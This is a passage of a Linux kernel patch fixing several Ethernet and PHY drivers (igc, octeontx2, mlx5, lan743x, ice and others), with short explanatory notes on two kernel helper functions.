+ #define ENA_MIN_ADMIN_POLL_US 100
+ 
+ #define ENA_MAX_ADMIN_POLL_US 5000
+@@ -536,6 +538,7 @@ static int ena_com_comp_status_to_errno(struct ena_com_admin_queue *admin_queue,
+ 
+ static void ena_delay_exponential_backoff_us(u32 exp, u32 delay_us)
+ {
++	exp = min_t(u32, exp, ENA_MAX_BACKOFF_DELAY_EXP);
+ 	delay_us = max_t(u32, ENA_MIN_ADMIN_POLL_US, delay_us);
+ 	delay_us = min_t(u32, delay_us * (1U << exp), ENA_MAX_ADMIN_POLL_US);
+ 	usleep_range(delay_us, 2 * delay_us);
+diff --git a/drivers/net/ethernet/broadcom/bgmac.c b/drivers/net/ethernet/broadcom/bgmac.c
+index 1761df8fb7f96..10c7c232cc4ec 100644
+--- a/drivers/net/ethernet/broadcom/bgmac.c
++++ b/drivers/net/ethernet/broadcom/bgmac.c
+@@ -1492,8 +1492,6 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 
+ 	bgmac->in_init = true;
+ 
+-	bgmac_chip_intrs_off(bgmac);
+-
+ 	net_dev->irq = bgmac->irq;
+ 	SET_NETDEV_DEV(net_dev, bgmac->dev);
+ 	dev_set_drvdata(bgmac->dev, bgmac);
+@@ -1511,6 +1509,8 @@ int bgmac_enet_probe(struct bgmac *bgmac)
+ 	 */
+ 	bgmac_clk_enable(bgmac, 0);
+ 
++	bgmac_chip_intrs_off(bgmac);
++
+ 	/* This seems to be fixing IRQ by assigning OOB #6 to the core */
+ 	if (!(bgmac->feature_flags & BGMAC_FEAT_IDM_MASK)) {
+ 		if (bgmac->feature_flags & BGMAC_FEAT_IRQ_ID_OOB_6)
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index bf9e246784b6e..1fe8038587ac8 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -664,5 +664,7 @@ void bcmgenet_mii_exit(struct net_device *dev)
+ 	if (of_phy_is_fixed_link(dn))
+ 		of_phy_deregister_fixed_link(dn);
+ 	of_node_put(priv->phy_dn);
++	clk_prepare_enable(priv->clk);
+ 	platform_device_unregister(priv->mii_pdev);
++	clk_disable_unprepare(priv->clk);
+ }
+diff --git a/drivers/net/ethernet/google/gve/gve_ethtool.c b/drivers/net/ethernet/google/gve/gve_ethtool.c
+index 38df602f2869c..033f17cb96be0 100644
+--- a/drivers/net/ethernet/google/gve/gve_ethtool.c
++++ b/drivers/net/ethernet/google/gve/gve_ethtool.c
+@@ -541,6 +541,9 @@ static int gve_get_link_ksettings(struct net_device *netdev,
+ 		err = gve_adminq_report_link_speed(priv);
+ 
+ 	cmd->base.speed = priv->link_speed;
++
++	cmd->base.duplex = DUPLEX_FULL;
++
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 7a5ec3ce3407a..8f77088900e94 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -7852,10 +7852,10 @@ static int
+ ice_validate_mqprio_qopt(struct ice_vsi *vsi,
+ 			 struct tc_mqprio_qopt_offload *mqprio_qopt)
+ {
+-	u64 sum_max_rate = 0, sum_min_rate = 0;
+ 	int non_power_of_2_qcount = 0;
+ 	struct ice_pf *pf = vsi->back;
+ 	int max_rss_q_cnt = 0;
++	u64 sum_min_rate = 0;
+ 	struct device *dev;
+ 	int i, speed;
+ 	u8 num_tc;
+@@ -7871,6 +7871,7 @@ ice_validate_mqprio_qopt(struct ice_vsi *vsi,
+ 	dev = ice_pf_to_dev(pf);
+ 	vsi->ch_rss_size = 0;
+ 	num_tc = mqprio_qopt->qopt.num_tc;
++	speed = ice_get_link_speed_kbps(vsi);
+ 
+ 	for (i = 0; num_tc; i++) {
+ 		int qcount = mqprio_qopt->qopt.count[i];
+@@ -7911,7 +7912,6 @@ ice_validate_mqprio_qopt(struct ice_vsi *vsi,
+ 		 */
+ 		max_rate = mqprio_qopt->max_rate[i];
+ 		max_rate = div_u64(max_rate, ICE_BW_KBPS_DIVISOR);
+-		sum_max_rate += max_rate;
+ 
+ 		/* min_rate is minimum guaranteed rate and it can't be zero */
+ 		min_rate = mqprio_qopt->min_rate[i];
+@@ -7924,6 +7924,12 @@ ice_validate_mqprio_qopt(struct ice_vsi *vsi,
+ 			return -EINVAL;
+ 		}
+ 
++		if (max_rate && max_rate > speed) {
++			dev_err(dev, "TC%d: max_rate(%llu Kbps) > link speed of %u Kbps\n",
++				i, max_rate, speed);
++			return -EINVAL;
++		}
++
+ 		iter_div_u64_rem(min_rate, ICE_MIN_BW_LIMIT, &rem);
+ 		if (rem) {
+ 			dev_err(dev, "TC%d: Min Rate not multiple of %u Kbps",
+@@ -7961,12 +7967,6 @@ ice_validate_mqprio_qopt(struct ice_vsi *vsi,
+ 	    (mqprio_qopt->qopt.offset[i] + mqprio_qopt->qopt.count[i]))
+ 		return -EINVAL;
+ 
+-	speed = ice_get_link_speed_kbps(vsi);
+-	if (sum_max_rate && sum_max_rate > (u64)speed) {
+-		dev_err(dev, "Invalid max Tx rate(%llu) Kbps > speed(%u) Kbps specified\n",
+-			sum_max_rate, speed);
+-		return -EINVAL;
+-	}
+ 	if (sum_min_rate && sum_min_rate > (u64)speed) {
+ 		dev_err(dev, "Invalid min Tx rate(%llu) Kbps > speed (%u) Kbps specified\n",
+ 			sum_min_rate, speed);
+diff --git a/drivers/net/ethernet/intel/igc/igc_ethtool.c b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+index 8cc077b712add..511fc3f412087 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ethtool.c
++++ b/drivers/net/ethernet/intel/igc/igc_ethtool.c
+@@ -1707,6 +1707,8 @@ static int igc_ethtool_get_link_ksettings(struct net_device *netdev,
+ 	/* twisted pair */
+ 	cmd->base.port = PORT_TP;
+ 	cmd->base.phy_address = hw->phy.addr;
++	ethtool_link_ksettings_add_link_mode(cmd, supported, TP);
++	ethtool_link_ksettings_add_link_mode(cmd, advertising, TP);
+ 
+ 	/* advertising link modes */
+ 	if (hw->phy.autoneg_advertised & ADVERTISE_10_HALF)
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index b67a6a81474f5..273941f90f066 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -709,7 +709,6 @@ static void igc_configure_tx_ring(struct igc_adapter *adapter,
+ 	/* disable the queue */
+ 	wr32(IGC_TXDCTL(reg_idx), 0);
+ 	wrfl();
+-	mdelay(10);
+ 
+ 	wr32(IGC_TDLEN(reg_idx),
+ 	     ring->count * sizeof(union igc_adv_tx_desc));
+@@ -1015,7 +1014,7 @@ static __le32 igc_tx_launchtime(struct igc_ring *ring, ktime_t txtime,
+ 	ktime_t base_time = adapter->base_time;
+ 	ktime_t now = ktime_get_clocktai();
+ 	ktime_t baset_est, end_of_cycle;
+-	u32 launchtime;
++	s32 launchtime;
+ 	s64 n;
+ 
+ 	n = div64_s64(ktime_sub_ns(now, base_time), cycle_time);
+@@ -1028,7 +1027,7 @@ static __le32 igc_tx_launchtime(struct igc_ring *ring, ktime_t txtime,
+ 			*first_flag = true;
+ 			ring->last_ff_cycle = baset_est;
+ 
+-			if (ktime_compare(txtime, ring->last_tx_cycle) > 0)
++			if (ktime_compare(end_of_cycle, ring->last_tx_cycle) > 0)
+ 				*insert_empty = true;
+ 		}
+ 	}
+diff --git a/drivers/net/ethernet/intel/igc/igc_ptp.c b/drivers/net/ethernet/intel/igc/igc_ptp.c
+index 4e10ced736dbb..d96cdccdc1e1e 100644
+--- a/drivers/net/ethernet/intel/igc/igc_ptp.c
++++ b/drivers/net/ethernet/intel/igc/igc_ptp.c
+@@ -356,16 +356,35 @@ static int igc_ptp_feature_enable_i225(struct ptp_clock_info *ptp,
+ 			tsim &= ~IGC_TSICR_TT0;
+ 		}
+ 		if (on) {
++			struct timespec64 safe_start;
+ 			int i = rq->perout.index;
+ 
+ 			igc_pin_perout(igc, i, pin, use_freq);
+-			igc->perout[i].start.tv_sec = rq->perout.start.sec;
++			igc_ptp_read(igc, &safe_start);
++
++			/* PPS output start time is triggered by the Target
++			 * time (TT) register. Programming any past time value
++			 * into the TT register will cause PPS to never start,
++			 * so we need to program the TT register to a time in
++			 * the future. There isn't a stringent need to fire PPS
++			 * out right away; adding +2 seconds should take care
++			 * of corner cases: even if SYSTIML is close to
++			 * wrapping and the timer keeps ticking as we program
++			 * the register, +2 seconds is a safe bet.
++			 */
++			safe_start.tv_sec += 2;
++
++			if (rq->perout.start.sec < safe_start.tv_sec)
++				igc->perout[i].start.tv_sec = safe_start.tv_sec;
++			else
++				igc->perout[i].start.tv_sec = rq->perout.start.sec;
+ 			igc->perout[i].start.tv_nsec = rq->perout.start.nsec;
+ 			igc->perout[i].period.tv_sec = ts.tv_sec;
+ 			igc->perout[i].period.tv_nsec = ts.tv_nsec;
+-			wr32(trgttimh, rq->perout.start.sec);
++			wr32(trgttimh, (u32)igc->perout[i].start.tv_sec);
+ 			/* For now, always select timer 0 as source. */
+-			wr32(trgttiml, rq->perout.start.nsec | IGC_TT_IO_TIMER_SEL_SYSTIM0);
++			wr32(trgttiml, (u32)(igc->perout[i].start.tv_nsec |
++					     IGC_TT_IO_TIMER_SEL_SYSTIM0));
+ 			if (use_freq)
+ 				wr32(freqout, ns);
+ 			tsauxc |= tsauxc_mask;
+diff --git a/drivers/net/ethernet/marvell/mvneta.c b/drivers/net/ethernet/marvell/mvneta.c
+index 5aefaaff08711..aca5b72cfeec6 100644
+--- a/drivers/net/ethernet/marvell/mvneta.c
++++ b/drivers/net/ethernet/marvell/mvneta.c
+@@ -1505,7 +1505,7 @@ static void mvneta_defaults_set(struct mvneta_port *pp)
+ 			 */
+ 			if (txq_number == 1)
+ 				txq_map = (cpu == pp->rxq_def) ?
+-					MVNETA_CPU_TXQ_ACCESS(1) : 0;
++					MVNETA_CPU_TXQ_ACCESS(0) : 0;
+ 
+ 		} else {
+ 			txq_map = MVNETA_CPU_TXQ_ACCESS_ALL_MASK;
+@@ -4294,7 +4294,7 @@ static void mvneta_percpu_elect(struct mvneta_port *pp)
+ 		 */
+ 		if (txq_number == 1)
+ 			txq_map = (cpu == elected_cpu) ?
+-				MVNETA_CPU_TXQ_ACCESS(1) : 0;
++				MVNETA_CPU_TXQ_ACCESS(0) : 0;
+ 		else
+ 			txq_map = mvreg_read(pp, MVNETA_CPU_MAP(cpu)) &
+ 				MVNETA_CPU_TXQ_ACCESS_ALL_MASK;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/ptp.c b/drivers/net/ethernet/marvell/octeontx2/af/ptp.c
+index 3411e2e47d46b..0ee420a489fc4 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/ptp.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/ptp.c
+@@ -208,7 +208,7 @@ struct ptp *ptp_get(void)
+ 	/* Check driver is bound to PTP block */
+ 	if (!ptp)
+ 		ptp = ERR_PTR(-EPROBE_DEFER);
+-	else
++	else if (!IS_ERR(ptp))
+ 		pci_dev_get(ptp->pdev);
+ 
+ 	return ptp;
+@@ -388,11 +388,10 @@ static int ptp_extts_on(struct ptp *ptp, int on)
+ static int ptp_probe(struct pci_dev *pdev,
+ 		     const struct pci_device_id *ent)
+ {
+-	struct device *dev = &pdev->dev;
+ 	struct ptp *ptp;
+ 	int err;
+ 
+-	ptp = devm_kzalloc(dev, sizeof(*ptp), GFP_KERNEL);
++	ptp = kzalloc(sizeof(*ptp), GFP_KERNEL);
+ 	if (!ptp) {
+ 		err = -ENOMEM;
+ 		goto error;
+@@ -428,20 +427,19 @@ static int ptp_probe(struct pci_dev *pdev,
+ 	return 0;
+ 
+ error_free:
+-	devm_kfree(dev, ptp);
++	kfree(ptp);
+ 
+ error:
+ 	/* For `ptp_get()` we need to differentiate between the case
+ 	 * when the core has not tried to probe this device and the case when
+-	 * the probe failed.  In the later case we pretend that the
+-	 * initialization was successful and keep the error in
++	 * the probe failed.  In the later case we keep the error in
+ 	 * `dev->driver_data`.
+ 	 */
+ 	pci_set_drvdata(pdev, ERR_PTR(err));
+ 	if (!first_ptp_block)
+ 		first_ptp_block = ERR_PTR(err);
+ 
+-	return 0;
++	return err;
+ }
+ 
+ static void ptp_remove(struct pci_dev *pdev)
+@@ -449,16 +447,17 @@ static void ptp_remove(struct pci_dev *pdev)
+ 	struct ptp *ptp = pci_get_drvdata(pdev);
+ 	u64 clock_cfg;
+ 
+-	if (cn10k_ptp_errata(ptp) && hrtimer_active(&ptp->hrtimer))
+-		hrtimer_cancel(&ptp->hrtimer);
+-
+ 	if (IS_ERR_OR_NULL(ptp))
+ 		return;
+ 
++	if (cn10k_ptp_errata(ptp) && hrtimer_active(&ptp->hrtimer))
++		hrtimer_cancel(&ptp->hrtimer);
++
+ 	/* Disable PTP clock */
+ 	clock_cfg = readq(ptp->reg_base + PTP_CLOCK_CFG);
+ 	clock_cfg &= ~PTP_CLOCK_CFG_PTP_EN;
+ 	writeq(clock_cfg, ptp->reg_base + PTP_CLOCK_CFG);
++	kfree(ptp);
+ }
+ 
+ static const struct pci_device_id ptp_id_table[] = {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index 873f081c030de..733add3a9dc6b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -3244,7 +3244,7 @@ static int rvu_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	rvu->ptp = ptp_get();
+ 	if (IS_ERR(rvu->ptp)) {
+ 		err = PTR_ERR(rvu->ptp);
+-		if (err == -EPROBE_DEFER)
++		if (err)
+ 			goto err_release_regions;
+ 		rvu->ptp = NULL;
+ 	}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 8cb2a0181fb9b..705325431dec3 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -3804,21 +3804,14 @@ int rvu_mbox_handler_nix_set_rx_mode(struct rvu *rvu, struct nix_rx_mode *req,
+ 	}
+ 
+ 	/* install/uninstall promisc entry */
+-	if (promisc) {
++	if (promisc)
+ 		rvu_npc_install_promisc_entry(rvu, pcifunc, nixlf,
+ 					      pfvf->rx_chan_base,
+ 					      pfvf->rx_chan_cnt);
+-
+-		if (rvu_npc_exact_has_match_table(rvu))
+-			rvu_npc_exact_promisc_enable(rvu, pcifunc);
+-	} else {
++	else
+ 		if (!nix_rx_multicast)
+ 			rvu_npc_enable_promisc_entry(rvu, pcifunc, nixlf, false);
+ 
+-		if (rvu_npc_exact_has_match_table(rvu))
+-			rvu_npc_exact_promisc_disable(rvu, pcifunc);
+-	}
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index 3b48b635977f6..3b0a66c0977a7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -1168,8 +1168,10 @@ static u16 __rvu_npc_exact_cmd_rules_cnt_update(struct rvu *rvu, int drop_mcam_i
+ {
+ 	struct npc_exact_table *table;
+ 	u16 *cnt, old_cnt;
++	bool promisc;
+ 
+ 	table = rvu->hw->table;
++	promisc = table->promisc_mode[drop_mcam_idx];
+ 
+ 	cnt = &table->cnt_cmd_rules[drop_mcam_idx];
+ 	old_cnt = *cnt;
+@@ -1181,13 +1183,18 @@ static u16 __rvu_npc_exact_cmd_rules_cnt_update(struct rvu *rvu, int drop_mcam_i
+ 
+ 	*enable_or_disable_cam = false;
+ 
+-	/* If all rules are deleted, disable cam */
++	if (promisc)
++		goto done;
++
++	/* If all rules are deleted and we are not already in promisc
++	 * mode, disable the cam
++	 */
+ 	if (!*cnt && val < 0) {
+ 		*enable_or_disable_cam = true;
+ 		goto done;
+ 	}
+ 
+-	/* If rule got added, enable cam */
++	/* If a rule got added and we are not already in promisc mode, enable the cam */
+ 	if (!old_cnt && val > 0) {
+ 		*enable_or_disable_cam = true;
+ 		goto done;
+@@ -1466,6 +1473,12 @@ int rvu_npc_exact_promisc_disable(struct rvu *rvu, u16 pcifunc)
+ 	*promisc = false;
+ 	mutex_unlock(&table->lock);
+ 
++	/* Enable drop rule */
++	rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX,
++					   true);
++
++	dev_dbg(rvu->dev, "%s: Disabled promisc mode (cgx=%d lmac=%d)\n",
++		__func__, cgx_id, lmac_id);
+ 	return 0;
+ }
+ 
+@@ -1507,6 +1520,12 @@ int rvu_npc_exact_promisc_enable(struct rvu *rvu, u16 pcifunc)
+ 	*promisc = true;
+ 	mutex_unlock(&table->lock);
+ 
++	/* Disable drop rule */
++	rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX,
++					   false);
++
++	dev_dbg(rvu->dev, "%s: Enabled promisc mode (cgx=%d lmac=%d)\n",
++		__func__, cgx_id, lmac_id);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index d0554f6d26731..934c199667b59 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -867,6 +867,14 @@ static int otx2_prepare_flow_request(struct ethtool_rx_flow_spec *fsp,
+ 				return -EINVAL;
+ 
+ 			vlan_etype = be16_to_cpu(fsp->h_ext.vlan_etype);
++
++			/* Drop rule with vlan_etype == 802.1Q
++			 * and vlan_id == 0 is not supported
++			 */
++			if (vlan_etype == ETH_P_8021Q && !fsp->m_ext.vlan_tci &&
++			    fsp->ring_cookie == RX_CLS_FLOW_DISC)
++				return -EINVAL;
++
+ 			/* Only ETH_P_8021Q and ETH_P_802AD types supported */
+ 			if (vlan_etype != ETH_P_8021Q &&
+ 			    vlan_etype != ETH_P_8021AD)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+index 6a01ab1a6e6f3..1aeb18a901b13 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+@@ -579,6 +579,21 @@ static int otx2_tc_prepare_flow(struct otx2_nic *nic, struct otx2_tc_flow *node,
+ 			return -EOPNOTSUPP;
+ 		}
+ 
++		if (!match.mask->vlan_id) {
++			struct flow_action_entry *act;
++			int i;
++
++			flow_action_for_each(i, act, &rule->action) {
++				if (act->id == FLOW_ACTION_DROP) {
++					netdev_err(nic->netdev,
++						   "vlan tpid 0x%x with vlan_id %d is not supported for DROP rule.\n",
++						   ntohs(match.key->vlan_tpid),
++						   match.key->vlan_id);
++					return -EOPNOTSUPP;
++				}
++			}
++		}
++
+ 		if (match.mask->vlan_id ||
+ 		    match.mask->vlan_dei ||
+ 		    match.mask->vlan_priority) {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+index 03cb79adf912f..be83ad9db82a4 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/fs_tt_redirect.c
+@@ -594,7 +594,7 @@ int mlx5e_fs_tt_redirect_any_create(struct mlx5e_flow_steering *fs)
+ 
+ 	err = fs_any_create_table(fs);
+ 	if (err)
+-		return err;
++		goto err_free_any;
+ 
+ 	err = fs_any_enable(fs);
+ 	if (err)
+@@ -606,8 +606,8 @@ int mlx5e_fs_tt_redirect_any_create(struct mlx5e_flow_steering *fs)
+ 
+ err_destroy_table:
+ 	fs_any_destroy_table(fs_any);
+-
+-	kfree(fs_any);
++err_free_any:
+ 	mlx5e_fs_set_any(fs, NULL);
++	kfree(fs_any);
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+index efd02ce4425de..72b4781f0eb2f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/ptp.c
+@@ -729,8 +729,10 @@ int mlx5e_ptp_open(struct mlx5e_priv *priv, struct mlx5e_params *params,
+ 
+ 	c = kvzalloc_node(sizeof(*c), GFP_KERNEL, dev_to_node(mlx5_core_dma_dev(mdev)));
+ 	cparams = kvzalloc(sizeof(*cparams), GFP_KERNEL);
+-	if (!c || !cparams)
+-		return -ENOMEM;
++	if (!c || !cparams) {
++		err = -ENOMEM;
++		goto err_free;
++	}
+ 
+ 	c->priv     = priv;
+ 	c->mdev     = priv->mdev;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/fs_tcp.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/fs_tcp.c
+index d7c020f724013..06c47404996bb 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/fs_tcp.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/fs_tcp.c
+@@ -190,6 +190,7 @@ static int accel_fs_tcp_create_groups(struct mlx5e_flow_table *ft,
+ 	in = kvzalloc(inlen, GFP_KERNEL);
+ 	if  (!in || !ft->g) {
+ 		kfree(ft->g);
++		ft->g = NULL;
+ 		kvfree(in);
+ 		return -ENOMEM;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index 7883b625634fb..7ab489520a873 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -1551,7 +1551,8 @@ static void remove_unready_flow(struct mlx5e_tc_flow *flow)
+ 	uplink_priv = &rpriv->uplink_priv;
+ 
+ 	mutex_lock(&uplink_priv->unready_flows_lock);
+-	unready_flow_del(flow);
++	if (flow_flag_test(flow, NOT_READY))
++		unready_flow_del(flow);
+ 	mutex_unlock(&uplink_priv->unready_flows_lock);
+ }
+ 
+@@ -1896,8 +1897,7 @@ static void mlx5e_tc_del_fdb_flow(struct mlx5e_priv *priv,
+ 	esw_attr = attr->esw_attr;
+ 	mlx5e_put_flow_tunnel_id(flow);
+ 
+-	if (flow_flag_test(flow, NOT_READY))
+-		remove_unready_flow(flow);
++	remove_unready_flow(flow);
+ 
+ 	if (mlx5e_is_offloaded_flow(flow)) {
+ 		if (flow_flag_test(flow, SLOW))
+diff --git a/drivers/net/ethernet/microchip/lan743x_main.c b/drivers/net/ethernet/microchip/lan743x_main.c
+index 50eeecba1f18d..e804613faa1fc 100644
+--- a/drivers/net/ethernet/microchip/lan743x_main.c
++++ b/drivers/net/ethernet/microchip/lan743x_main.c
+@@ -144,6 +144,18 @@ static int lan743x_csr_light_reset(struct lan743x_adapter *adapter)
+ 				  !(data & HW_CFG_LRST_), 100000, 10000000);
+ }
+ 
++static int lan743x_csr_wait_for_bit_atomic(struct lan743x_adapter *adapter,
++					   int offset, u32 bit_mask,
++					   int target_value, int udelay_min,
++					   int udelay_max, int count)
++{
++	u32 data;
++
++	return readx_poll_timeout_atomic(LAN743X_CSR_READ_OP, offset, data,
++					 target_value == !!(data & bit_mask),
++					 udelay_max, udelay_min * count);
++}
++
+ static int lan743x_csr_wait_for_bit(struct lan743x_adapter *adapter,
+ 				    int offset, u32 bit_mask,
+ 				    int target_value, int usleep_min,
+@@ -746,8 +758,8 @@ static int lan743x_dp_write(struct lan743x_adapter *adapter,
+ 	u32 dp_sel;
+ 	int i;
+ 
+-	if (lan743x_csr_wait_for_bit(adapter, DP_SEL, DP_SEL_DPRDY_,
+-				     1, 40, 100, 100))
++	if (lan743x_csr_wait_for_bit_atomic(adapter, DP_SEL, DP_SEL_DPRDY_,
++					    1, 40, 100, 100))
+ 		return -EIO;
+ 	dp_sel = lan743x_csr_read(adapter, DP_SEL);
+ 	dp_sel &= ~DP_SEL_MASK_;
+@@ -758,8 +770,9 @@ static int lan743x_dp_write(struct lan743x_adapter *adapter,
+ 		lan743x_csr_write(adapter, DP_ADDR, addr + i);
+ 		lan743x_csr_write(adapter, DP_DATA_0, buf[i]);
+ 		lan743x_csr_write(adapter, DP_CMD, DP_CMD_WRITE_);
+-		if (lan743x_csr_wait_for_bit(adapter, DP_SEL, DP_SEL_DPRDY_,
+-					     1, 40, 100, 100))
++		if (lan743x_csr_wait_for_bit_atomic(adapter, DP_SEL,
++						    DP_SEL_DPRDY_,
++						    1, 40, 100, 100))
+ 			return -EIO;
+ 	}
+ 
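
The helper added above builds on readx_poll_timeout_atomic() from <linux/iopoll.h>, which busy-waits with udelay() rather than sleeping, so it stays safe where the sleeping lan743x_csr_wait_for_bit() is not (presumably the data-port write path can run in atomic context). A minimal sketch of the same call, with the accessor, register, and bit names taken from the hunk and the constants from the lan743x_dp_write() call site:

	u32 data;
	int ret;

	/* Re-read DP_SEL every 100 us until DP_SEL_DPRDY_ is set; give up
	 * after 40 * 100 us total and return -ETIMEDOUT.  No sleeping
	 * occurs, so this is legal under a spinlock.
	 */
	ret = readx_poll_timeout_atomic(LAN743X_CSR_READ_OP, DP_SEL, data,
					data & DP_SEL_DPRDY_,
					100,		/* delay between reads, us */
					40 * 100);	/* total timeout, us */
	if (ret)
		return -EIO;
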
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_lif.c b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+index 159bfcc76498c..a89ab455af67d 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_lif.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_lif.c
+@@ -462,11 +462,6 @@ static void ionic_qcqs_free(struct ionic_lif *lif)
+ static void ionic_link_qcq_interrupts(struct ionic_qcq *src_qcq,
+ 				      struct ionic_qcq *n_qcq)
+ {
+-	if (WARN_ON(n_qcq->flags & IONIC_QCQ_F_INTR)) {
+-		ionic_intr_free(n_qcq->cq.lif->ionic, n_qcq->intr.index);
+-		n_qcq->flags &= ~IONIC_QCQ_F_INTR;
+-	}
+-
+ 	n_qcq->intr.vector = src_qcq->intr.vector;
+ 	n_qcq->intr.index = src_qcq->intr.index;
+ 	n_qcq->napi_qcq = src_qcq->napi_qcq;
+diff --git a/drivers/net/netdevsim/dev.c b/drivers/net/netdevsim/dev.c
+index 68e56e451b2be..c3fbdd6b68baf 100644
+--- a/drivers/net/netdevsim/dev.c
++++ b/drivers/net/netdevsim/dev.c
+@@ -184,13 +184,10 @@ static ssize_t nsim_dev_trap_fa_cookie_write(struct file *file,
+ 	cookie_len = (count - 1) / 2;
+ 	if ((count - 1) % 2)
+ 		return -EINVAL;
+-	buf = kmalloc(count, GFP_KERNEL | __GFP_NOWARN);
+-	if (!buf)
+-		return -ENOMEM;
+ 
+-	ret = simple_write_to_buffer(buf, count, ppos, data, count);
+-	if (ret < 0)
+-		goto free_buf;
++	buf = memdup_user(data, count);
++	if (IS_ERR(buf))
++		return PTR_ERR(buf);
+ 
+ 	fa_cookie = kmalloc(sizeof(*fa_cookie) + cookie_len,
+ 			    GFP_KERNEL | __GFP_NOWARN);
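
The memdup_user() call above replaces an open-coded kmalloc() plus simple_write_to_buffer() pair and reports copy failures as -EFAULT. For reference, the helper is essentially the following (a sketch of mm/util.c; the exact allocator call and flags vary by kernel version):

void *memdup_user(const void __user *src, size_t len)
{
	void *p;

	p = kmalloc(len, GFP_USER | __GFP_NOWARN);
	if (!p)
		return ERR_PTR(-ENOMEM);

	if (copy_from_user(p, src, len)) {
		kfree(p);
		return ERR_PTR(-EFAULT);
	}

	return p;
}
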
+diff --git a/drivers/net/phy/dp83td510.c b/drivers/net/phy/dp83td510.c
+index 3cd9a77f95324..d7616b13c5946 100644
+--- a/drivers/net/phy/dp83td510.c
++++ b/drivers/net/phy/dp83td510.c
+@@ -12,6 +12,11 @@
+ 
+ /* MDIO_MMD_VEND2 registers */
+ #define DP83TD510E_PHY_STS			0x10
++/* Bit 7 - mii_interrupt, active high. Clears on read.
++ * Note: clearing it does not necessarily deactivate the IRQ pin if
++ * interrupts are pending. This differs from the DP83TD510E datasheet
++ * (2020), which states that this bit clears on a write of 0.
++ */
+ #define DP83TD510E_STS_MII_INT			BIT(7)
+ #define DP83TD510E_LINK_STATUS			BIT(0)
+ 
+@@ -53,12 +58,6 @@ static int dp83td510_config_intr(struct phy_device *phydev)
+ 	int ret;
+ 
+ 	if (phydev->interrupts == PHY_INTERRUPT_ENABLED) {
+-		/* Clear any pending interrupts */
+-		ret = phy_write_mmd(phydev, MDIO_MMD_VEND2, DP83TD510E_PHY_STS,
+-				    0x0);
+-		if (ret)
+-			return ret;
+-
+ 		ret = phy_write_mmd(phydev, MDIO_MMD_VEND2,
+ 				    DP83TD510E_INTERRUPT_REG_1,
+ 				    DP83TD510E_INT1_LINK_EN);
+@@ -81,10 +80,6 @@ static int dp83td510_config_intr(struct phy_device *phydev)
